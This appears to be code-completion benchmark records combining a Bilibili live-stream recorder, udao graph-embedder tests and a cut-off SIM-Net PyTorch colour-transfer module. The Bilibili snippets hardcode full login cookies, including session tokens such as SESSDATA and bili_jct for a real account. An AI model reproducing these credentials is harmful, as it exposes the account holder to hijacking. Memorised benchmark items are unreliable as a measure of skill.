SESSDATA=c555e98c%2C1711883936%2Caf616%2Aa2CjAD_KFN4n_1-0P_VrGmaHuTOhode3kKsjtR7Aq0iz1U5TFRzKUl69JUDZ-5W532pswSVkFKMUpyQkQ3NmlWYldjLWtnSG9hcG9lQ1RYa0VKaEh3TFlybGxjdlpJQkkwekYwYy0tckZhc1d3eWlrT1k2NHpvQmQtS1MtUGlxU2RxdEM2UFcyWWlnIIEC; bili_jct=f30d6a38050b9fd22f87748b88e5c40f; sid=8nj7ny5x; bili_ticket=eyJhbGciOiJIUzI1NiIsImtpZCI6InMwMyIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTY2MDgwNDYsImlhdCI6MTY5NjM0ODc4NiwicGx0IjotMX0.P976bqS0e1zm2k4khjnX5aqxWCmSIE-zA6MlVXq32wo; bili_ticket_expires=1696607986; fingerprint=c2d58d86c60e35d56558bf9942a9deac; CURRENT_FNVAL=4048; home_feed_column=5; browser_resolution=1699-945; share_source_origin=WEIXIN; bsource=share_source_weixinchat; bp_video_offset_325718681=849021837940621320; buvid_fp=c2d58d86c60e35d56558bf9942a9deac; b_lsid=5469973A_18B009161BC; PVID=1\"\n headers['Accept-Encoding'] = 'identity'\n headers['referer'] = 'https://www.bilibili.com/video/BV1XF411C7xh/?spm_id_from=333.1007.tianma.1-3-3.click&vd_source=d4827c2f1802c9c5b667bc324c406c18'\n headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47'\n\n retry_time = 0\n return durl_value, headers\n if durl_value:\n try:\n return durl_value, headers\n except Exception as e:\n time.sleep(1)\n print(\"retry\", retry_time,\n \"]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]\")\n print(e)\n retry_time += 1\n pass"
},
{
"identifier": "get_name",
"path": "api.py",
"snippet": "def get_name(uid):\n live_api = \"https://api.live.bilibili.com/room/v1/Room/room_init?id=%s\" % str(\n uid)\n rtn = my_request(live_api)\n data_dict = json.loads(rtn)\n\n data_value = data_dict.get('data')\n duid_value = data_value.get('uid')\n\n home_url = \"https://space.bilibili.com/%s/\" % duid_value\n\n headers = {\n 'cookie': \"buvid_fp_plain=undefined; CURRENT_BLACKGAP=0; blackside_state=0; LIVE_BUVID=AUTO2616596088417426; rpdid=|(k|m|))Y~k~0J'uYY)lmlul~; hit-new-style-dyn=1; go-back-dyn=1; is-2022-channel=1; header_theme_version=CLOSE; CURRENT_PID=b03f3c10-ceb5-11ed-b59d-47f8dacf4eec; FEED_LIVE_VERSION=V8; buvid3=103FCEA2-4D34-4196-5E7B-7321C8A1082118620infoc; b_nut=1690476718; _uuid=B1038F2AB-E8CD-29A2-4728-F82FE285F59D84428infoc; buvid4=CFCD8B8D-0FCC-F601-2753-DA825E11CFE613020-022072800-fr%2BgMSZdqRJTFAAYsS9ACQ%3D%3D; i-wanna-go-back=-1; b_ut=5; hit-dyn-v2=1; i-wanna-go-feeds=2; DedeUserID=325718681; DedeUserID__ckMd5=319313351948fd48; CURRENT_QUALITY=116; SESSDATA=c555e98c%2C1711883936%2Caf616%2Aa2CjAD_KFN4n_1-0P_VrGmaHuTOhode3kKsjtR7Aq0iz1U5TFRzKUl69JUDZ-5W532pswSVkFKMUpyQkQ3NmlWYldjLWtnSG9hcG9lQ1RYa0VKaEh3TFlybGxjdlpJQkkwekYwYy0tckZhc1d3eWlrT1k2NHpvQmQtS1MtUGlxU2RxdEM2UFcyWWlnIIEC; bili_jct=f30d6a38050b9fd22f87748b88e5c40f; sid=8nj7ny5x; bili_ticket=eyJhbGciOiJIUzI1NiIsImtpZCI6InMwMyIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTY2MDgwNDYsImlhdCI6MTY5NjM0ODc4NiwicGx0IjotMX0.P976bqS0e1zm2k4khjnX5aqxWCmSIE-zA6MlVXq32wo; bili_ticket_expires=1696607986; fingerprint=c2d58d86c60e35d56558bf9942a9deac; CURRENT_FNVAL=4048; home_feed_column=5; browser_resolution=1699-945; share_source_origin=WEIXIN; bsource=share_source_weixinchat; bp_video_offset_325718681=849021837940621320; buvid_fp=c2d58d86c60e35d56558bf9942a9deac; b_lsid=5469973A_18B009161BC; PVID=1\",\n # 'referer': \"https://space.bilibili.com/353609978/\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47\"\n }\n response = requests.get(url=home_url, headers=headers)\n user_name = re.findall(r'<title>(.*?)的个人空间', response.text)[0]\n if user_name:\n return (user_name)\n else:\n return (\"未找到指定用户名称\")"
},
{
"identifier": "my_request",
"path": "api.py",
"snippet": "def my_request(url):\n headers = dict()\n headers['cookie'] = r\"buvid_fp_plain=undefined; CURRENT_BLACKGAP=0; blackside_state=0; LIVE_BUVID=AUTO2616596088417426; rpdid=|(k|m|))Y~k~0J'uYY)lmlul~; hit-new-style-dyn=1; go-back-dyn=1; is-2022-channel=1; header_theme_version=CLOSE; CURRENT_PID=b03f3c10-ceb5-11ed-b59d-47f8dacf4eec; FEED_LIVE_VERSION=V8; buvid3=103FCEA2-4D34-4196-5E7B-7321C8A1082118620infoc; b_nut=1690476718; _uuid=B1038F2AB-E8CD-29A2-4728-F82FE285F59D84428infoc; buvid4=CFCD8B8D-0FCC-F601-2753-DA825E11CFE613020-022072800-fr%2BgMSZdqRJTFAAYsS9ACQ%3D%3D; i-wanna-go-back=-1; b_ut=5; hit-dyn-v2=1; i-wanna-go-feeds=2; DedeUserID=325718681; DedeUserID__ckMd5=319313351948fd48; CURRENT_QUALITY=116; SESSDATA=c555e98c%2C1711883936%2Caf616%2Aa2CjAD_KFN4n_1-0P_VrGmaHuTOhode3kKsjtR7Aq0iz1U5TFRzKUl69JUDZ-5W532pswSVkFKMUpyQkQ3NmlWYldjLWtnSG9hcG9lQ1RYa0VKaEh3TFlybGxjdlpJQkkwekYwYy0tckZhc1d3eWlrT1k2NHpvQmQtS1MtUGlxU2RxdEM2UFcyWWlnIIEC; bili_jct=f30d6a38050b9fd22f87748b88e5c40f; sid=8nj7ny5x; bili_ticket=eyJhbGciOiJIUzI1NiIsImtpZCI6InMwMyIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTY2MDgwNDYsImlhdCI6MTY5NjM0ODc4NiwicGx0IjotMX0.P976bqS0e1zm2k4khjnX5aqxWCmSIE-zA6MlVXq32wo; bili_ticket_expires=1696607986; fingerprint=c2d58d86c60e35d56558bf9942a9deac; CURRENT_FNVAL=4048; home_feed_column=5; browser_resolution=1699-945; share_source_origin=WEIXIN; bsource=share_source_weixinchat; bp_video_offset_325718681=849021837940621320; buvid_fp=c2d58d86c60e35d56558bf9942a9deac; b_lsid=5469973A_18B009161BC; PVID=1\"\n headers['Accept-Encoding'] = 'identity'\n headers['referer'] = 'https://www.bilibili.com/video/BV1XF411C7xh/?spm_id_from=333.1007.tianma.1-3-3.click&vd_source=d4827c2f1802c9c5b667bc324c406c18'\n headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47'\n\n response = requests.get(url=url, headers=headers)\n return response.text"
}
] | import os
import json
import traceback
import sys
import re
import streamlink
import threading
import requests
import time
import datetime
import urllib
import socket
from api import is_live, get_stream_url, get_name, my_request
from urllib import request
| 3,539 |
socket.setdefaulttimeout(5.0)
def record(real_url, file_name, headers):
if not real_url:
return
res = None
try:
with urllib.request.urlopen(urllib.request.Request(real_url, headers=headers)) as response:
size = 0
with open(file_name, 'wb') as f:
print('starting download from:\n%s\nto:\n%s' %
(real_url, file_name))
chunk_size = 64*1024
while True:
chunk = response.read(chunk_size)
if not chunk:
print('连接中断')
break
f.write(chunk)
#size += len(chunk)
#print('{:<4.2f} MB downloaded'.format(
# size/1024/1024), datetime.datetime.now(), end="\r")
except Exception as e:
print("=============================")
print(e)
print("=============================")
finally:
print("finnally")
if res:
res.close()
print("res.close()")
if os.path.isfile(file_name) and os.path.getsize(file_name) == 0:
os.remove(file_name)
print("os.remove(file_name)")
def __main__(id,filename):
#conf = json.load(open("_config.json"))
_id = id
|
socket.setdefaulttimeout(5.0)
def record(real_url, file_name, headers):
if not real_url:
return
res = None
try:
with urllib.request.urlopen(urllib.request.Request(real_url, headers=headers)) as response:
size = 0
with open(file_name, 'wb') as f:
print('starting download from:\n%s\nto:\n%s' %
(real_url, file_name))
chunk_size = 64*1024
while True:
chunk = response.read(chunk_size)
if not chunk:
print('连接中断')
break
f.write(chunk)
#size += len(chunk)
#print('{:<4.2f} MB downloaded'.format(
# size/1024/1024), datetime.datetime.now(), end="\r")
except Exception as e:
print("=============================")
print(e)
print("=============================")
finally:
print("finnally")
if res:
res.close()
print("res.close()")
if os.path.isfile(file_name) and os.path.getsize(file_name) == 0:
os.remove(file_name)
print("os.remove(file_name)")
def __main__(id,filename):
#conf = json.load(open("_config.json"))
_id = id
| _name = get_name(int(_id))
| 2 | 2023-12-16 17:08:02+00:00 | 4k |
Angryrou/udao | udao/model/tests/embedders/test_base_graph_embedder.py | [
{
"identifier": "BaseGraphEmbedder",
"path": "udao/model/embedders/base_graph_embedder.py",
"snippet": "class BaseGraphEmbedder(BaseEmbedder, ABC):\n \"\"\"Base class for Embedder networks.\n Takes care of preparing the input features for the\n embedding layer, and normalizing the output embedding.\n\n Parameters\n ----------\n net_params : EmbedderParams\n \"\"\"\n\n @dataclass\n class Params(BaseEmbedder.Params):\n input_size: int # depends on the data\n \"\"\"The size of the input features, except for the type of operation.\n If type is provided, the input size is increased at init\n by the type embedding dimension.\n \"\"\"\n n_op_types: Optional[int] # depends on the data\n \"\"\"The number of operation types.\"\"\"\n op_groups: Sequence[str]\n \"\"\"The groups of operation features to be included in the embedding.\"\"\"\n type_embedding_dim: Optional[int]\n \"\"\"The dimension of the operation type embedding.\"\"\"\n embedding_normalizer: Optional[NormalizerType]\n \"\"\"Name of the normalizer to use for the output embedding.\"\"\"\n\n @classmethod\n def from_iterator_shape(\n cls,\n iterator_shape: UdaoEmbedItemShape[Dict[str, int]],\n **kwargs: Any,\n ) -> \"BaseGraphEmbedder\":\n embedding_input_shapes = iterator_shape.embedding_input_shape\n op_groups = [name for name in embedding_input_shapes.keys()]\n input_size = sum(\n [embedding_input_shapes[name] for name in op_groups if name != \"type\"]\n )\n n_op_types = None\n if \"type\" in op_groups:\n n_op_types = iterator_shape.embedding_input_shape[\"type\"]\n params_dict = {\n \"op_groups\": op_groups,\n \"n_op_types\": n_op_types,\n \"input_size\": input_size,\n **kwargs,\n }\n if any((name not in cls.Params.__dataclass_fields__) for name in params_dict):\n for name in params_dict:\n if name not in cls.Params.__dataclass_fields__:\n logger.debug(f\"{name} is not a valid parameter for {cls.__name__}\")\n raise ValueError(f\"Some parameters are not valid for {cls.__name__} Params\")\n return cls(cls.Params(**params_dict))\n\n def __init__(self, net_params: Params) -> None:\n super().__init__(net_params)\n self.input_size = net_params.input_size\n\n op_groups = net_params.op_groups\n self.op_type = \"type\" in op_groups\n self.op_cbo = \"cbo\" in op_groups\n self.op_enc = \"op_enc\" in op_groups\n if self.op_type:\n if net_params.n_op_types is None or net_params.type_embedding_dim is None:\n raise ValueError(\n \"n_op_types and type_embedding_dim must be provided \"\n \"if `type` is included in op_groups\"\n )\n self.op_embedder = nn.Embedding(\n net_params.n_op_types, net_params.type_embedding_dim\n )\n self.input_size += net_params.type_embedding_dim\n self.out_norm: Optional[nn.Module] = None\n if net_params.embedding_normalizer is None:\n self.out_norm = None\n elif net_params.embedding_normalizer == \"BN\":\n self.out_norm = nn.BatchNorm1d(self.embedding_size)\n elif net_params.embedding_normalizer == \"LN\":\n self.out_norm = nn.LayerNorm(self.embedding_size)\n elif net_params.embedding_normalizer == \"IsoBN\":\n self.out_norm = IsoBN(self.embedding_size)\n else:\n raise ValueError(net_params.embedding_normalizer)\n\n def concatenate_op_features(self, g: dgl.DGLGraph) -> th.Tensor:\n \"\"\"Concatenate the operation features into a single tensor.\n\n Parameters\n ----------\n g : dgl.DGLGraph\n Input graph\n\n Returns\n -------\n th.Tensor\n output tensor of shape (num_nodes, input_size)\n \"\"\"\n op_list = []\n if self.op_type:\n op_list.append(self.op_embedder(g.ndata[\"op_gid\"]))\n if self.op_cbo:\n op_list.append(g.ndata[\"cbo\"])\n if self.op_enc:\n op_list.append(g.ndata[\"op_enc\"])\n op_tensor = 
th.cat(op_list, dim=1) if len(op_list) > 1 else op_list[0]\n return op_tensor\n\n def normalize_embedding(self, embedding: th.Tensor) -> th.Tensor:\n \"\"\"Normalizes the embedding.\"\"\"\n if self.out_norm is not None:\n embedding = self.out_norm(embedding)\n return embedding"
},
{
"identifier": "generate_dgl_graph",
"path": "udao/model/tests/embedders/conftest.py",
"snippet": "def generate_dgl_graph(num_nodes: int, num_edges: int, features: dict) -> dgl.DGLGraph:\n u = th.tensor(range(num_edges))\n v = th.tensor(range(1, num_edges + 1))\n g = dgl.graph((u, v))\n for feat_name, props in features.items():\n if props[\"type\"] == \"float\":\n g.ndata[feat_name] = th.randn(num_nodes, props[\"size\"])\n elif props[\"type\"] == \"int\":\n g.ndata[feat_name] = th.randint(0, 3, (num_nodes, props[\"size\"]))\n if props[\"size\"] == 1:\n g.ndata[feat_name] = g.ndata[feat_name].squeeze() # type: ignore\n return g"
}
] | import pytest
import torch as th
from ...embedders.base_graph_embedder import BaseGraphEmbedder
from .conftest import generate_dgl_graph | 1,607 |
def test_base_embedder_initialization() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="BN",
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
assert embedder.input_size == 10
assert embedder.embedding_size == 10
assert embedder.op_type
assert embedder.op_cbo
assert not embedder.op_enc
def test_base_embedder_invalid_normalizer() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="UNKNOWN", # type: ignore
n_op_types=3,
)
with pytest.raises(ValueError):
BaseGraphEmbedder(params)
def test_base_embedder_concatenate_op_features() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer=None,
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
|
def test_base_embedder_initialization() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="BN",
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
assert embedder.input_size == 10
assert embedder.embedding_size == 10
assert embedder.op_type
assert embedder.op_cbo
assert not embedder.op_enc
def test_base_embedder_invalid_normalizer() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="UNKNOWN", # type: ignore
n_op_types=3,
)
with pytest.raises(ValueError):
BaseGraphEmbedder(params)
def test_base_embedder_concatenate_op_features() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer=None,
n_op_types=3,
)
embedder = BaseGraphEmbedder(params) | g = generate_dgl_graph( | 1 | 2023-12-20 09:10:42+00:00 | 4k |
SnailForce/SIM-Net | models/texture_model/heatmap_detector.py | [
{
"identifier": "Hourglass",
"path": "models/spatial_model/util.py",
"snippet": "class Hourglass(nn.Module):\n \"\"\"\n Hourglass architecture.\n \"\"\"\n\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\n super(Hourglass, self).__init__()\n self.encoder = Encoder(block_expansion, in_features, num_blocks, max_features)\n self.decoder = Decoder(block_expansion, in_features, num_blocks, max_features)\n self.out_filters = self.decoder.out_filters\n\n def forward(self, x):\n return self.decoder(self.encoder(x))"
},
{
"identifier": "make_coordinate_grid",
"path": "models/spatial_model/util.py",
"snippet": "def make_coordinate_grid(spatial_size, type):\n \"\"\"\n Create a meshgrid [-1,1] x [-1,1] of given spatial_size.\n \"\"\"\n h, w = spatial_size\n x = torch.arange(w).type(type)\n y = torch.arange(h).type(type)\n\n x = (2 * (x / (w - 1)) - 1)\n y = (2 * (y / (h - 1)) - 1)\n\n yy = y.view(-1, 1).repeat(1, w)\n xx = x.view(1, -1).repeat(h, 1)\n\n meshed = torch.cat([xx.unsqueeze_(2), yy.unsqueeze_(2)], 2)\n\n return meshed"
},
{
"identifier": "AntiAliasInterpolation2d",
"path": "models/spatial_model/util.py",
"snippet": "class AntiAliasInterpolation2d(nn.Module):\n \"\"\"\n Band-limited downsampling, for better preservation of the input signal.\n \"\"\"\n def __init__(self, channels, scale):\n super(AntiAliasInterpolation2d, self).__init__()\n sigma = (1 / scale - 1) / 2\n kernel_size = 2 * round(sigma * 4) + 1\n self.ka = kernel_size // 2\n self.kb = self.ka - 1 if kernel_size % 2 == 0 else self.ka\n\n kernel_size = [kernel_size, kernel_size]\n sigma = [sigma, sigma]\n # The gaussian kernel is the product of the\n # gaussian function of each dimension.\n kernel = 1\n meshgrids = torch.meshgrid(\n [\n torch.arange(size, dtype=torch.float32)\n for size in kernel_size\n ]\n )\n for size, std, mgrid in zip(kernel_size, sigma, meshgrids):\n mean = (size - 1) / 2\n kernel *= torch.exp(-(mgrid - mean) ** 2 / (2 * std ** 2))\n\n # Make sure sum of values in gaussian kernel equals 1.\n kernel = kernel / torch.sum(kernel)\n # Reshape to depthwise convolutional weight\n kernel = kernel.view(1, 1, *kernel.size())\n kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1))\n\n self.register_buffer('weight', kernel)\n self.groups = channels\n self.scale = scale\n inv_scale = 1 / scale\n self.int_inv_scale = int(inv_scale)\n\n def forward(self, input):\n if self.scale == 1.0:\n return input\n\n out = F.pad(input, (self.ka, self.kb, self.ka, self.kb))\n out = F.conv2d(out, weight=self.weight, groups=self.groups)\n out = out[:, :, ::self.int_inv_scale, ::self.int_inv_scale]\n\n return out"
},
{
"identifier": "kp2gaussian",
"path": "models/spatial_model/util.py",
"snippet": "def kp2gaussian(kp, spatial_size, kp_variance):\n \"\"\"\n Transform a keypoint into gaussian like representation\n \"\"\"\n mean = kp['value']\n\n coordinate_grid = make_coordinate_grid(spatial_size, mean.type())\n number_of_leading_dimensions = len(mean.shape) - 1\n shape = (1,) * number_of_leading_dimensions + coordinate_grid.shape\n coordinate_grid = coordinate_grid.view(*shape)\n repeats = mean.shape[:number_of_leading_dimensions] + (1, 1, 1)\n coordinate_grid = coordinate_grid.repeat(*repeats).to(mean.device)\n\n # Preprocess kp shape\n shape = mean.shape[:number_of_leading_dimensions] + (1, 1, 2)\n mean = mean.view(*shape)\n\n mean_sub = (coordinate_grid - mean)\n out = torch.exp(-0.5 * (mean_sub ** 2).sum(-1) / kp_variance)\n\n return out"
}
] | from numpy.core.fromnumeric import mean
from torch import nn
from ..spatial_model.util import Hourglass, make_coordinate_grid, AntiAliasInterpolation2d,kp2gaussian
import torch
import torch.nn.functional as F
import numpy as np | 3,295 | ycbcr_image = torch.where(ycbcr_image < 0.06275,torch.ones_like(ycbcr_image) * 0.06275,ycbcr_image)
bs,c,h,w = ycbcr_image.shape
ycbcr_image = ycbcr_image.view(bs,c,-1)
transform_matrix = self.transform_matrix_inv.type(ycbcr_image.type())
shift_matrix = self.shift_matrix_inv.type(ycbcr_image.type())
rgb_image = torch.matmul(transform_matrix.unsqueeze(0),ycbcr_image) - shift_matrix.unsqueeze(0).unsqueeze(-1)
rgb_image = torch.where(rgb_image > 1,torch.ones_like(rgb_image),rgb_image)
rgb_image = torch.where(rgb_image < 0,torch.zeros_like(rgb_image),rgb_image)
return rgb_image.reshape(bs,c,h,w)
def rgb2lab(self,rgb_image):
transform_matrix = torch.tensor([[0.3811, 0.5783, 0.0402],
[0.1967, 0.7244, 0.0782],
[0.0241, 0.1288, 0.8444]])
transform_matrix = transform_matrix.type(rgb_image.type())
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
lab_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image)
lab_image = torch.log(lab_image)
matrix_1 = torch.tensor([[1 / np.sqrt(3),0,0],
[0,1 / np.sqrt(6),0],
[0,0,1/np.sqrt(2)]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-2],
[1,-1,0]])
matrix = torch.matmul(matrix_1,matrix_2)
matrix = matrix.type(rgb_image.type())
return torch.matmul(matrix.unsqueeze(0),lab_image).reshape(bs,c,h,w)
def lab2rgb(self,lab_image):
transform_matrix = torch.tensor([[4.4679 ,3.5873 ,0.1193],
[-1.2186, 2.3809, 0.1624],
[0.0497, 0.2439, 1.2045]])
transform_matrix = transform_matrix.type(lab_image.type())
matrix_1 = torch.tensor([[ np.sqrt(3) / 3,0,0],
[0,np.sqrt(6) / 6,0],
[0,0,np.sqrt(2) / 2]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-1],
[1,-2,0]])
matrix = torch.matmul(matrix_2,matrix_1)
matrix = matrix.type(lab_image.type())
bs,c,h,w = lab_image.shape
lab_image = lab_image.view(bs,c,-1)
rgb_image= torch.matmul(matrix.unsqueeze(0),lab_image)
rgb_image = torch.pow(10,rgb_image)
return torch.matmul(transform_matrix.unsqueeze(0),rgb_image).reshape(bs,c,h,w)
def weighted_mean(self,values,weighted,dim=-1):
return torch.sum(values * weighted,dim) / (torch.sum(weighted,dim) + 1e-8)
def weighted_mean_std(self,values,weighted,dim=-1):
mean = self.weighted_mean(values,weighted)
return mean,torch.sqrt(self.weighted_mean((values - mean.unsqueeze(-1))**2,weighted,dim) + 1e-8)
def create_code(self,source_image,source_heatmaps):
bs, c, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).repeat(1, self.num_kp, 1, 1,1)
source_repeat_flatten = source_repeat.view((bs,self.num_kp,c,-1))
source_heatmaps_flatten = source_heatmaps.view((bs,self.num_kp,1,-1))
source_mean,source_std = self.weighted_mean_std(source_repeat_flatten,source_heatmaps_flatten)
source_std = source_std.unsqueeze(-1).unsqueeze(-1) + 1e-8
source_mean = source_mean.unsqueeze(-1).unsqueeze(-1)
source_image_code = (source_repeat - source_mean) / source_std
return source_image_code,source_mean,source_std
def create_transformed_source_image(self, source_image, target_image, source_heatmaps,target_heatmaps,common_heaatmaps):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
bs, c, h, w = source_image.shape
source_image = source_image.clone()
source_image[:,:3] = self.rgb2ycbcr(source_image[:,:3])
target_image = target_image.clone()
target_image[:,:3] = self.rgb2ycbcr(target_image[:,:3])
source_image_code,_,_ = self.create_code(source_image,source_heatmaps)
target_image_code,target_mean,target_std = self.create_code(target_image,target_heatmaps)
target_image_code = self.create_deformed_source_image(target_image_code,self.sparse_motion)
source_weight = self.weight * 1000
target_weight = (1 - self.weight) * 1000
transformed_image_code = target_image_code.clone()
transformed_image_code[:,:,0]= (source_image_code[:,:,0] * source_weight + target_image_code[:,:,0] * target_weight) / (source_weight + target_weight + 1e-8)
transformed_image = transformed_image_code * target_std + target_mean
return transformed_image
def create_deformed_source_image(self, source_image, sparse_motions):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
if len(source_image.shape) == 5:
bs, _,_, h, w = source_image.shape
source_repeat = source_image.clone()
else:
bs, _, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).unsqueeze(1).repeat(1, self.num_kp + 1, 1, 1, 1, 1)
source_repeat = source_repeat.view(bs * (self.num_kp + 1), -1, h, w)
sparse_motions = sparse_motions.contiguous().view((bs * (self.num_kp + 1), h, w, -1))
sparse_deformed = F.grid_sample(source_repeat, sparse_motions, padding_mode = 'zeros')
sparse_deformed = sparse_deformed.view((bs, self.num_kp + 1 , -1, h, w))
return sparse_deformed
def create_sparse_motions(self, source_image, kp_driving, kp_source):
bs, _, h, w = source_image.shape
|
class DenseNetwork(nn.Module):
"""
Module that predicting a dense motion from sparse motion representation given by kp_source and kp_driving
"""
def __init__(self, block_expansion, num_blocks, max_features, num_kp, num_channels,
scale_factor=1, kp_variance=0.01):
super(DenseNetwork, self).__init__()
self.hourglass = Hourglass(block_expansion=block_expansion, in_features=(num_kp + 1) * (num_channels + 1),
max_features=max_features, num_blocks=num_blocks)
self.mask = nn.Conv2d(self.hourglass.out_filters, num_kp + 1, kernel_size=(7, 7), padding=(3, 3))
self.num_kp = num_kp
self.scale_factor = scale_factor
self.kp_variance = kp_variance
self.transform_matrix = torch.tensor([[0.257, 0.564, 0.098],
[-0.148, -0.291, 0.439],
[0.439, -0.368, -0.071]])
self.shift_matrix = torch.tensor([16.0, 128.0, 128.0]) / 255
self.shift_matrix.type(self.transform_matrix.type())
self.transform_matrix_inv = self.transform_matrix.inverse()
self.shift_matrix_inv = torch.matmul(self.transform_matrix_inv,self.shift_matrix)
if self.scale_factor != 1:
self.down = AntiAliasInterpolation2d(num_channels, self.scale_factor)
self.weight = 0.2
def create_heatmap_representations(self, spatial_size, kp):
heatmap = kp2gaussian(kp, spatial_size=spatial_size, kp_variance=self.kp_variance)
#adding background feature
zeros = torch.zeros(heatmap.shape[0], 1, spatial_size[0], spatial_size[1]).type(heatmap.type())
heatmap = torch.cat([zeros, heatmap], dim=1)
heatmap = heatmap.unsqueeze(2)
return heatmap
def rgb2ycbcr(self,rgb_image):
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
transform_matrix = self.transform_matrix.type(rgb_image.type())
shift_matrix = self.shift_matrix.type(rgb_image.type())
ycbcr_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image) + shift_matrix.unsqueeze(0).unsqueeze(-1)
return ycbcr_image.reshape(bs,c,h,w)
def ycbcr2rgb(self,ycbcr_image):
ycbcr_image[:,1:] = torch.where(ycbcr_image[:,1:] > 0.94118,torch.ones_like(ycbcr_image[:,1:]) * 0.94118,ycbcr_image[:,1:])
ycbcr_image[:,0] = torch.where(ycbcr_image[:,0] > 0.92157,torch.ones_like(ycbcr_image[:,0]) * 0.92157,ycbcr_image[:,0])
ycbcr_image = torch.where(ycbcr_image < 0.06275,torch.ones_like(ycbcr_image) * 0.06275,ycbcr_image)
bs,c,h,w = ycbcr_image.shape
ycbcr_image = ycbcr_image.view(bs,c,-1)
transform_matrix = self.transform_matrix_inv.type(ycbcr_image.type())
shift_matrix = self.shift_matrix_inv.type(ycbcr_image.type())
rgb_image = torch.matmul(transform_matrix.unsqueeze(0),ycbcr_image) - shift_matrix.unsqueeze(0).unsqueeze(-1)
rgb_image = torch.where(rgb_image > 1,torch.ones_like(rgb_image),rgb_image)
rgb_image = torch.where(rgb_image < 0,torch.zeros_like(rgb_image),rgb_image)
return rgb_image.reshape(bs,c,h,w)
def rgb2lab(self,rgb_image):
transform_matrix = torch.tensor([[0.3811, 0.5783, 0.0402],
[0.1967, 0.7244, 0.0782],
[0.0241, 0.1288, 0.8444]])
transform_matrix = transform_matrix.type(rgb_image.type())
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
lab_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image)
lab_image = torch.log(lab_image)
matrix_1 = torch.tensor([[1 / np.sqrt(3),0,0],
[0,1 / np.sqrt(6),0],
[0,0,1/np.sqrt(2)]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-2],
[1,-1,0]])
matrix = torch.matmul(matrix_1,matrix_2)
matrix = matrix.type(rgb_image.type())
return torch.matmul(matrix.unsqueeze(0),lab_image).reshape(bs,c,h,w)
def lab2rgb(self,lab_image):
transform_matrix = torch.tensor([[4.4679 ,3.5873 ,0.1193],
[-1.2186, 2.3809, 0.1624],
[0.0497, 0.2439, 1.2045]])
transform_matrix = transform_matrix.type(lab_image.type())
matrix_1 = torch.tensor([[ np.sqrt(3) / 3,0,0],
[0,np.sqrt(6) / 6,0],
[0,0,np.sqrt(2) / 2]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-1],
[1,-2,0]])
matrix = torch.matmul(matrix_2,matrix_1)
matrix = matrix.type(lab_image.type())
bs,c,h,w = lab_image.shape
lab_image = lab_image.view(bs,c,-1)
rgb_image= torch.matmul(matrix.unsqueeze(0),lab_image)
rgb_image = torch.pow(10,rgb_image)
return torch.matmul(transform_matrix.unsqueeze(0),rgb_image).reshape(bs,c,h,w)
def weighted_mean(self,values,weighted,dim=-1):
return torch.sum(values * weighted,dim) / (torch.sum(weighted,dim) + 1e-8)
def weighted_mean_std(self,values,weighted,dim=-1):
mean = self.weighted_mean(values,weighted)
return mean,torch.sqrt(self.weighted_mean((values - mean.unsqueeze(-1))**2,weighted,dim) + 1e-8)
def create_code(self,source_image,source_heatmaps):
bs, c, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).repeat(1, self.num_kp, 1, 1,1)
source_repeat_flatten = source_repeat.view((bs,self.num_kp,c,-1))
source_heatmaps_flatten = source_heatmaps.view((bs,self.num_kp,1,-1))
source_mean,source_std = self.weighted_mean_std(source_repeat_flatten,source_heatmaps_flatten)
source_std = source_std.unsqueeze(-1).unsqueeze(-1) + 1e-8
source_mean = source_mean.unsqueeze(-1).unsqueeze(-1)
source_image_code = (source_repeat - source_mean) / source_std
return source_image_code,source_mean,source_std
def create_transformed_source_image(self, source_image, target_image, source_heatmaps,target_heatmaps,common_heaatmaps):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
bs, c, h, w = source_image.shape
source_image = source_image.clone()
source_image[:,:3] = self.rgb2ycbcr(source_image[:,:3])
